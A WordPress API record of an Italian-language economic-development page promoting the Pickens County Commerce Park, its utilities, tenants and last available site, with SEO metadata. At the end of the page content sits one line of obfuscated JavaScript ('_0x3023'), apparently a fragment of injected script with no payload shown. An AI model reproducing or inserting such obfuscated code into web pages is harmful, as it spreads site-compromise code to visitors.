{"id":11982,"date":"2020-12-04T17:56:53","date_gmt":"2020-12-04T17:56:53","guid":{"rendered":"http:\/\/alliancepickens.com\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/"},"modified":"2020-12-09T20:37:36","modified_gmt":"2020-12-09T20:37:36","slug":"parco-commerciale-della-contea-di-pickens","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/","title":{"rendered":"Parco commerciale della contea di Pickens"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9815&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Il Pickens County Commerce Park \u00e8 un parco industriale di classe A di 310 acri con 6.000 piedi di fronte principale sulla strada statale 123 a quattro corsie. Il Pickens County Commerce Park dispone di un&#8217;infrastruttura di utilit\u00e0 completa che comprende 2 fornitori di energia elettrica, un interruttore in fibra dedicato, un&#8217;ampia capacit\u00e0 di acque reflue, capacit\u00e0 idrica e un serbatoio di stoccaggio dell&#8217;acqua da 1 milione di galloni che \u00e8 dedicato per l&#8217;uso da parte degli impianti di Commerce Park.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/P9cls2EmFko&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/r9VClCbSsmo&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/wZQoJ4p6FMo&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5565&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">Le aziende del Pickens County Commerce Park includono:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-contatto USA<\/li>\n<li>Tecnologie IPSUM<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Tecnologie di automazione JR<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>Azienda di irrigatori automatici affidabile<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast Stati Uniti<\/li>\n<li>Taylormade<\/li>\n<li>Utensile e stampo uniti<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Le caratteristiche di Pickens County Commerce Park includono:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Parco Industriale di Classe A<\/li>\n<li>Alleanze protettive in atto <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Per saperne di pi\u00f9<\/a><\/li>\n<li>Due sottostazioni elettriche e due fornitori di energia elettrica<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Interruttore in fibra digitale in locale<\/li>\n<li>Infrastruttura robusta in atto<\/li>\n<li>Oltre 1,1 milioni di piedi quadrati di costruzione di edifici<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Ambiente simile a quello del campus<\/li>\n<li>Tra Charlotte, NC e Atlanta, GA<\/li>\n<li>Un sito rimanente<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/\">Scopri di pi\u00f9 sul Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_empty_space][vc_column_text]Se la tua azienda \u00e8 interessata a saperne di pi\u00f9 sull&#8217;ultimo sito industriale disponibile nel Pickens County Commerce Park, <a href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact\">contatta <\/a>Alliance Pickens. <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants.pdf\">Guarda le alleanze protettive per il Pickens County Commerce Park<\/a>[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;10660&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-1.pdf&#8221;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400\">Il sito A \u00e8 l&#8217;ultimo sito del Pickens County Commerce Park. Venti (20) acri da tavolo si affacciano sulle Blue Ridge Mountains. Il filmato del drone mostra i rendering per uno (1) e due (2) layout di edifici. Questi rendering seguono le pi\u00f9 semplici  <\/span><span style=\"font-weight: 400\">standard stabiliti nei Pickens County <\/span> <span style=\"font-weight: 400\">Commerce Park Protective Covenants.<\/span>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10665&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni su siti ed edifici<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9815&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Il Pickens County Commerce Park \u00e8 un parco industriale di classe A di 310 acri con 6.000 piedi di fronte principale sulla strada statale 123 a quattro corsie. Il Pickens County Commerce Park dispone di un&#8217;infrastruttura di utilit\u00e0 completa che comprende 2 fornitori di energia elettrica, un interruttore in fibra&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8668,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-11982","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Parco commerciale della contea di Pickens - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Parco commerciale della contea di Pickens - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9815&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Il Pickens County Commerce Park \u00e8 un parco industriale di classe A di 310 acri con 6.000 piedi di fronte principale sulla strada statale 123 a quattro corsie. Il Pickens County Commerce Park dispone di un&#8217;infrastruttura di utilit\u00e0 completa che comprende 2 fornitori di energia elettrica, un interruttore in fibra&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:37:36+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/parco-commerciale-della-contea-di-pickens\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/parco-commerciale-della-contea-di-pickens\\\/\",\"name\":\"Parco commerciale della contea di Pickens - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"datePublished\":\"2020-12-04T17:56:53+00:00\",\"dateModified\":\"2020-12-09T20:37:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/parco-commerciale-della-contea-di-pickens\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/parco-commerciale-della-contea-di-pickens\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/parco-commerciale-della-contea-di-pickens\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Siti ed edifici\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/siti-ed-edifici\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Parco commerciale della contea di Pickens\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Parco commerciale della contea di Pickens - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/","og_locale":"it_IT","og_type":"article","og_title":"Parco commerciale della contea di Pickens - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9815&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Il Pickens County Commerce Park \u00e8 un parco industriale di classe A di 310 acri con 6.000 piedi di fronte principale sulla strada statale 123 a quattro corsie. Il Pickens County Commerce Park dispone di un&#8217;infrastruttura di utilit\u00e0 completa che comprende 2 fornitori di energia elettrica, un interruttore in fibra&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:37:36+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/","url":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/","name":"Parco commerciale della contea di Pickens - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"datePublished":"2020-12-04T17:56:53+00:00","dateModified":"2020-12-09T20:37:36+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/parco-commerciale-della-contea-di-pickens\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Siti ed edifici","item":"https:\/\/alliancepickens.com\/it\/siti-ed-edifici\/"},{"@type":"ListItem","position":3,"name":"Parco commerciale della contea di Pickens"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/11982","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=11982"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/11982\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/8668"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=11982"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}